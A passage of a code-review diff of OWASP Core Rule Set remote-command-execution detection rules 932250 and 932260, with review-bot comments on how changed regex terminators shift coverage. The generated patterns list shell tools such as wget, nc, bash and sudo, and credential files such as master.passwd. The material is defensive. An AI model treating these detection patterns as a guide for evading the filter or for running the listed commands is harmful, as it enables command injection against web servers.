*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\
s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))[\s\x0b&\),<>\|].*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*))" \ "id:932250,\ phase:2,\ block,\ @@ -508,7 +514,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" 
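Review bot: The `+SecRule` line of the 932250 hunk changes the matched command list, not only the anchoring: compared with the removed line, the `fd` and `udp` branches are gone and `pg` and `pwd` branches are new, in addition to every `(?:[\s\x0b&\),<>\|]|$)` terminator becoming `[\s\x0b&\),<>\|]`. The terminator change means a value that is exactly a command name with nothing after it no longer matches this PL1 rule; the comment hunks above attribute that case to 932340 (PL-1) and 932350 (PL-3), which are not in this chunk, so whether PL1 coverage of that case is preserved cannot be confirmed here. Because the regex is generated (`# crs-toolchain regex update 932250`), the list changes should be checked against the regex-assembly source for 932250 and its tests rather than in this line, and if they are deliberate a one-sentence mention in the rule's comment block would help the next reader. The same terminator change appears to be under way in the 932260 hunk that starts at the end of this chunk.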
@@ -526,6 +532,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 #
 # .932250 (base rule, PL1, targets two and three character commands)
 # .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+# .932340 (PL-1, matches commands with no arguments)
+# .932350 (PL-3, matches commands with no arguments)
 #
 # .932240 (generic detection, PL2, targets generic evasion attempts)
 # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
@@ -551,7 +559,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932260 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?
:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|nsible|pparmor_[^\s\x0b]{1,10}\b|rj(?:-register|disp)|tobm(?:[\s\x0b&\),<>\|]|$)|u(?:ditctl|repot|search))|b(?:ase(?:32|64|nc)|(?:lkid|rwap|yobu)(?:[\s\x0b&\),<>\|]|$)|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more))|c(?:[89]9-gcc|h(?:(?:attr|mod|o(?:om|wn)|sh)(?:[\s\x0b&\),<>\|]|$)|ef-|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$))|pass)|lang\+\+|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|mm(?:[\s\x0b&\),<>\|]|$)|proc)|(?:p(?:an|io)|scli)(?:[\s\x0b&\),<>\|]|$))|d(?:(?:iff|mesg|vips)(?:[\s\x0b&\),<>\|]|$)|o(?:as(?:[\s\x0b&\),<>\|]|$)|cker-)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:2fsck|
(?:fax|grep|macs|nd(?:if|sw)|sac|xpr)(?:[\s\x0b&\),<>\|]|$))|f(?:d(?:(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|grep(?:[\s\x0b&\),<>\|]|$)|iletest|ping(?:[\s\x0b&\),6<>\|]|$)|tp(?:stats|who))|g(?:(?:core|insh|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|(?:etca|unzi)p|hc(?:-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:(?:cat|ep)(?:[\s\x0b&\),<>\|]|$)|oupmod))|(?:htop|jexec)(?:[\s\x0b&\),<>\|]|$)|i(?:(?:conv|ftop)(?:[\s\x0b&\),<>\|]|$)|pp(?:eveprinter|find|tool))|l(?:ast(?:comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|osetup|s(?:(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|wp-download|z(?:4c(?:[\s\x0b&\),<>\|]|$|at)|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore)))|m(?:a(?:(?:ilq|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|k(?:fifo|nod(?:[\s\x0b&\),<>\|]|$)|temp)|locate|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:(?:a(?:sm|wk)|(?:ma|ohu)p|ping|roff|stat)(?:[\s\x0b&\),<>\|]|$)|c(?:\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|et(?:(?:c|st)at|kit-ftp|plan))|o(?:nintr|pkg(?:[\s\x0b&\),<>\|]|$))|p(?:d(?:b(?:2mb|3(?:[\s\x0b&\),\.<>\|]|$))|ksh(?:[\s\x0b&\),<>\|]|$))|(?:er(?:f|l5?)|(?:ft|gre)p|i(?:gz|ng6)|(?:op|ush)d|s(?:ed|ql))(?:[\s\x0b&\),<>\|]|$)|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|k(?:exec|ill(?:[\s\x0b&\),<>\|]|$))|rint(?:env|f(?:[\s\x0b&\),<>\|]|$))|tar(?:[\s\x0b&\),<>\|]|$|diff|grep)|wd\.db|y(?:3?versions|thon[23]))|r(?:(?:aku|bash|nano|pmdb|unc|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|e(?:alpath|boot(?:[\s\x0b&\),<>\|]|$))|m(?:dir(?:[\s\x0b&\),<>\|]|$)|t-(?:dump|tar)|user)|sync(?:-ssl|[\s\x0b&\),<>\|]|$))|s(?:(?:diff|ftp|lsh|ocat)(?:[\s\x0b&\),<>\|]|$)|e(?:ndmail(?:[\s\x0b&\),<>\|]|$)|t(?:cap|env|sid))|h(?:\.distrib|uf(?:[\s\x0b&\),<>\|]|$))|pwd\.db|sh-(?:a(?:dd|gent)|copy-id)|td(?:err|in(?:[\s\x0b&\),<>\|]|$)|out)|udo(?:-rs|[\s\x0b&\),<>_\|]|$|edit|replay)|vn(?:a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|versi
on)|ysctl)|t(?:(?:ailf|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:l?sh(?:[\s\x0b&\),<>\|]|$)|p(?:ing|traceroute))|elnet|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$)))|u(?:n(?:(?:iq|rar|xz)(?:[\s\x0b&\),<>\|]|$)|lz(?:4(?:[\s\x0b&\),<>\|]|$)|ma)|pigz|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:(?:gr|pw|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo(?:-rs)?)|w(?:get(?:[\s\x0b&\),<>\|]|$)|hoami)|x(?:(?:args|etex|more|pad|term)(?:[\s\x0b&\),<>\|]|$)|z(?:c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more))|z(?:(?:c(?:at|mp)|diff|grep|less|run)(?:[\s\x0b&\),<>\|]|$)|[ef]grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|mo(?:dload|re(?:[\s\x0b&\),<>\|]|$))|std(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less)))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\
x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|nsible|pparmor_[^\s\x0b]{1,10}\b|rj(?:-register|disp)|tobm[\s\x0b&\),<>\|]|u(?:ditctl|repot|search))|b(?:ase(?:32|64|nc)|(?:lkid|rwap|yobu)[\s\x0b&\),<>\|]|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|
z(?:c(?:at|mp)[\s\x0b&\),<>\|]|diff|e(?:grep|xe[\s\x0b&\),<>\|])|f?grep|ip2(?:[\s\x0b&\),<>\|]|recover)|less|more))|c(?:[89]9-gcc|h(?:(?:attr|mod|o(?:om|wn)|sh)[\s\x0b&\),<>\|]|ef-|g(?:passwd|rp[\s\x0b&\),<>\|])|pass)|lang\+\+|o(?:bc(?:[\s\x0b&\),<>\|]|run)|mm[\s\x0b&\),<>\|]|proc)|(?:p(?:an|io)|scli)[\s\x0b&\),<>\|])|d(?:(?:iff|mesg|vips)[\s\x0b&\),<>\|]|o(?:as[\s\x0b&\),<>\|]|cker-)|pkg[\s\x0b&\),\-<>\|])|e(?:2fsck|(?:fax|grep|macs|nd(?:if|sw)|sac|xpr)[\s\x0b&\),<>\|])|f(?:d(?:(?:find|isk)[\s\x0b&\),<>\|]|u?mount)|grep[\s\x0b&\),<>\|]|iletest|ping[\s\x0b&\),6<>\|]|tp(?:stats|who))|g(?:(?:core|insh|z(?:cat|exe|ip))[\s\x0b&\),<>\|]|(?:etca|unzi)p|hc(?:-[\s\x0b&\),<>\|]|i[\s\x0b&\),\-<>\|])|r(?:(?:cat|ep)[\s\x0b&\),<>\|]|oupmod))|(?:htop|jexec)[\s\x0b&\),<>\|]|i(?:(?:conv|ftop)[\s\x0b&\),<>\|]|pp(?:eveprinter|find|tool))|l(?:ast(?:comm[\s\x0b&\),<>\|]|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|get)|osetup|s(?:(?:-F|cpu|hw|mod|of|pci|usb)[\s\x0b&\),<>\|]|b_release)|wp-download|z(?:4c(?:[\s\x0b&\),<>\|]|at)|c(?:at|mp)[\s\x0b&\),<>\|]|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|dec|info)|ore)))|m(?:a(?:ilq|wk)[\s\x0b&\),<>\|]|k(?:fifo|nod[\s\x0b&\),<>\|]|temp)|locate|ysql(?:[\s\x0b&\),<>\|]|admin|dump(?:slow)?|hotcopy|show))|n(?:(?:a(?:sm|wk)|(?:ma|ohu)p|ping|roff|stat)[\s\x0b&\),<>\|]|c(?:\.(?:openbsd|traditional)|at[\s\x0b&\),<>\|])|et(?:(?:c|st)at|kit-ftp|plan))|o(?:nintr|pkg[\s\x0b&\),<>\|])|p(?:d(?:b(?:2mb|3[\s\x0b&\),\.<>\|])|ksh[\s\x0b&\),<>\|])|(?:er(?:f|l5?)|(?:ft|gre)p|i(?:gz|ng6)|(?:op|ush)d|s(?:ed|ql))[\s\x0b&\),<>\|]|hp(?:-cgi|[57][\s\x0b&\),<>\|])|k(?:exec|ill[\s\x0b&\),<>\|])|rint(?:env|f[\s\x0b&\),<>\|])|tar(?:[\s\x0b&\),<>\|]|diff|grep)|y(?:3?versions|thon[23]))|r(?:(?:aku|bash|nano|pmdb|unc|vi(?:ew|m))[\s\x0b&\),<>\|]|e(?:alpath|boot[\s\x0b&\),<>\|])|m(?:dir[\s\x0b&\),<>\|]|t-(?:dump|tar)|user)|sync(?:-ssl|[\s\x0b&\),<>\|]))|s(?:(?:diff|ftp|lsh|ocat)[\s\x0b&\),<>\|]|e(?:ndmail[\s\x0b&\),<>\|]|t(?:cap|env|sid))|h(?:\.distrib|uf[\s\x0b&
\),<>\|])|sh-(?:a(?:dd|gent)|copy-id)|udo(?:-rs|[\s\x0b&\),<>_\|]|edit|replay)|vn(?:a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|ysctl)|t(?:(?:ailf|ftp|imeout|mux)[\s\x0b&\),<>\|]|c(?:l?sh[\s\x0b&\),<>\|]|p(?:ing|traceroute))|elnet|r(?:a(?:ceroute6?|p[\s\x0b&\),<>\|])|off[\s\x0b&\),<>\|]))|u(?:n(?:(?:ame|iq|rar|xz)[\s\x0b&\),<>\|]|lz(?:4[\s\x0b&\),<>\|]|ma)|pigz|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:(?:gr|pw|rsh)[\s\x0b&\),<>\|]|sudo(?:-rs)?)|w(?:get[\s\x0b&\),<>\|]|ho(?:ami|is[\s\x0b&\),<>\|]))|x(?:(?:args|etex|more|pad|term)[\s\x0b&\),<>\|]|z(?:c(?:at|mp)[\s\x0b&\),<>\|]|d(?:ec[\s\x0b&\),<>\|]|iff)|[ef]?grep|less|more))|z(?:(?:c(?:at|mp)|diff|grep|less|run)[\s\x0b&\),<>\|]|[ef]grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|mo(?:dload|re[\s\x0b&\),<>\|])|std(?:[\s\x0b&\),<>\|]|(?:ca|m)t|grep|less)))" \ "id:932260,\ phase:2,\ block,\ 
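Review bot: The regenerated 932260 pattern turns every `(?:[\s\x0b&\),<>\|]|$)` terminator into `[\s\x0b&\),<>\|]` (and likewise after the `busybox`/`command`/`env`/`eval`/`watch`/`time` prefixes), so a known command word that ends the input no longer matches here and is only caught when it is one of the few words the new 932340/932350 list; that reads as the intended PL1 false-positive trade-off, but nothing near this rule records it. The header comment above the rule (outside the hunk) should state it, e.g. `# Argument-less commands at end of input are handled by 932340 (PL1) and 932350 (PL3).`, and the 932260 regression tests should pin the cases that moved. The same terminator change appears in the 932231 hunk at `@@ -984,7 +1056,7 @@`. The regenerated alternation also gains `timeout`, `uname`, `whois` and `trap`; the `.ra` source is not part of this diff, so confirm it was updated in lockstep rather than the generated output being hand-edited.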
@@ -567,7 +575,69 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
